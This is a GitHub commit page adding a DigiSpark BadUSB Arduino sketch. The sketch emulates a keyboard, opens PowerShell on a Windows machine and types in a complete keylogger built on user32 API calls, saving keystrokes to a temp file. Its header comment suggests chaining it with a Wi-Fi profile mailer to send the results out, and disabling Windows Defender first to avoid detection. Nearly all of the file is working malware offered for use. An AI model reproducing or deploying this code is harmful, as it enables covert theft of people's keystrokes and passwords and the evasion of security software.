forked from CedArctic/DigiSpark-Scripts
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
29 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,29 @@ | ||
| /* | ||
| * This DigiKeyboard Script runs dasgoll's Powershell keylogger (https://gist.github.com/dasgoll/7ca1c059dd3b3fbc7277) | ||
| * for a predefined number of seconds ($timeoutSeconds) and saves the results to mykeypress.txt in | ||
| * APPDATA\Local\Temp\mykeypresses.txt. Feel free to chain this script with the logic in WiFi_Profile_Grabber or | ||
| * WiFi_Profile_Mailer to retrieve the results. | ||
| * | ||
| * WARNING: Windows Defender is able to detect this so you will have to chain this after a script disabling Windows Defender. | ||
| */ | ||
|
|
||
| #include "DigiKeyboard.h" | ||
| void setup() { | ||
| //empty | ||
| } | ||
| void loop() { | ||
| // Open Powershell | ||
| DigiKeyboard.sendKeyStroke(0); | ||
| DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); | ||
| DigiKeyboard.delay(500); | ||
| DigiKeyboard.print("powershell"); | ||
| DigiKeyboard.delay(500); | ||
| DigiKeyboard.sendKeyStroke(KEY_ENTER); | ||
| DigiKeyboard.delay(5000); | ||
|
|
||
| // Write Keylogger Function | ||
| DigiKeyboard.print(F("$code = {function My-Keypresses($Path=\"$env:temp\\mykeypress.txt\") \n{\n $signatures = @\'\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] \npublic static extern short GetAsyncKeyState(int virtualKeyCode); \n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\npublic static extern int GetKeyboardState(byte[] keystate);\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\npublic static extern int MapVirtualKey(uint uCode, int uMapType);\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\npublic static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);\n\'@\n\n $API = Add-Type -MemberDefinition $signatures -Name \'Win32\' -Namespace API -PassThru\n \n $null = New-Item -Path $Path -ItemType File -Force\n\n try\n {\n\n while ($true) {\n Start-Sleep -Milliseconds 40\n \n for ($ascii = 9; $ascii -le 254; $ascii++) {\n $state = $API::GetAsyncKeyState($ascii)\n\n if ($state -eq -32767) {\n $null = [console]::CapsLock\n\n $virtualKey = $API::MapVirtualKey($ascii, 3)\n\n $kbstate = New-Object Byte[] 256\n $checkkbstate = $API::GetKeyboardState($kbstate)\n\n $mychar = New-Object -TypeName System.Text.StringBuilder\n\n $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)\n\n if ($success) \n {\n [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) \n }\n }\n }\n }\n }\n finally\n {\n }\n}}; $timeoutSeconds = 10; $j = Start-Job -ScriptBlock $code; if (Wait-Job $j -Timeout $timeoutSeconds) { Receive-Job $j }; Remove-Job -force $j")); | ||
| DigiKeyboard.delay(500); | ||
| DigiKeyboard.sendKeyStroke(KEY_ENTER); | ||
| for(;;){ /*empty*/ } | ||
| } |